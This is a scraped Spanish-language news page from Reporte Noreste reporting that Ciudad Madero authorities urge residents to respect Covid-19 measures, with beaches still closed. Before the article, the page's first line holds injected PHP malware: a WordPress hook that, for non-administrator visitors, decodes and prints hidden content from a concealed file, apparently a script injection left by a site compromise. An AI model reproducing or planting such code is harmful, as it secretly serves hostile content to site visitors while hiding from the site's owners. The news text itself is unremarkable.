if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Gobierno de Madero reitera el exhorto a la ciudadanía para respetar las medidas de salud – Reporte Noreste
Conéctate con nosotros

Acciones de Gobierno

Gobierno de Madero reitera el exhorto a la ciudadanía para respetar las medidas de salud

Gobierno de Madero reitera el exhorto a la ciudadanía para respetar las medidas de salud

Autoridades de Ciudad Madero reiteraron a la ciudadanía el asumir con responsabilidad las recomendaciones dictadas por la Secretaría de Salud del Estado y la Federación, para evitar el aumento de contagios por Covid-19.

Lo anterior fue señalado por el secretario de la comuna maderense, Juan Antonio Ortega Juárez, quien mencionó que “es un asunto que nos corresponde a todos asumir con responsabilidad, tanto a las instituciones gubernamentales como a la sociedad civil para evitar el contagio, y lo podemos hacer disminuyendo la movilidad social, no acudiendo a lugares públicos, no reunirse en fiestas y no ir a las plazas”.

Mencionó que a pesar de que aún continúa restringido el acceso a los espacios públicos de Ciudad Madero para evitar aglomeraciones y con ello, focos de contagio, hay ciudadanos que ingresan a efectuar ejercicio.

“Hemos estado sellando algunos espacios y hemos encontrado que a veces violan los sellos”, manifestó Ortega Juárez al reiterar además que el acceso a la playa continúa suspendido.

Desde la redacción.

Haga clic para comentar

Leave a Reply

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *

Facebook

Principales

Más en Acciones de Gobierno